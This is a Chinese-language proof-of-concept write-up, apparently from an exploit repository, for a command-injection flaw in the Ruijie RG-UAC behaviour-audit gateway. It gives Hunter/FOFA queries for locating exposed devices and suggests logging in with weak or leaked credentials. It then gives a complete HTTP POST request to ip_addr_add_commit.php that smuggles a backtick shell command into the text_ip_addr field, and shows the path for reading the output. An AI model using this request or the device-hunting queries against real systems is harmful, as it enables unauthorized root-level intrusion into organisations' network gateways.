POC/wpoc/锐捷/锐捷RG-UAC应用网关/锐捷RG-UAC统一上网行为管理审计系统ip_addr_add_commit后台命令执行漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

47 lines
1.7 KiB
Markdown

# 锐捷RG-UAC统一上网行为管理审计系统ip_addr_add_commit后台命令执行漏洞
# 一、漏洞简介
锐捷RG-UAC统一上网行为管理审计系统存在命令执行漏洞,可以通过漏洞获取root权限 。
# 二、影响版本
+ 锐捷RG-UAC统一上网行为管理审计系统
# 三、资产测绘
+ hunter`app.name="Ruijie 锐捷 RG-UAC"`
+ fofoa:`app="Ruijie-RG-UAC"`
登录页
![1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c.png](./img/MjJVTdoURakqdq8S/1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c-593129.png)
# 四、漏洞复现
使用弱口令/敏感信息泄露漏洞登录系统后台
![1714985896501-ee5e7557-a9fe-4b1f-9baa-a777b9f147e5.png](./img/MjJVTdoURakqdq8S/1714985896501-ee5e7557-a9fe-4b1f-9baa-a777b9f147e5-993540.png)
获取Cookie后使用下面poc
```plain
POST /view/networkConfig/IPConfig/ip_addr_add_commit.php HTTP/1.1
Host:
Cookie: PHPSESSID=ae63a240e1fdfb5614107040d19120f3
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Length: 49
text_ip_addr=`ls+>1.txt`&convert_mask=1&ethname=1
```
![1714986202461-e530da3e-9b79-43be-8e4c-805a91ed6016.png](./img/MjJVTdoURakqdq8S/1714986202461-e530da3e-9b79-43be-8e4c-805a91ed6016-785612.png)
```plain
/view/networkConfig/IPConfig/1.txt
```
![1714986238647-4c29726d-77d6-47f4-9a8c-fc144f5ca2dd.png](./img/MjJVTdoURakqdq8S/1714986238647-4c29726d-77d6-47f4-9a8c-fc144f5ca2dd-853295.png)
> 更新: 2024-06-24 11:42:28
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rwv0bwp1olbcnfw4>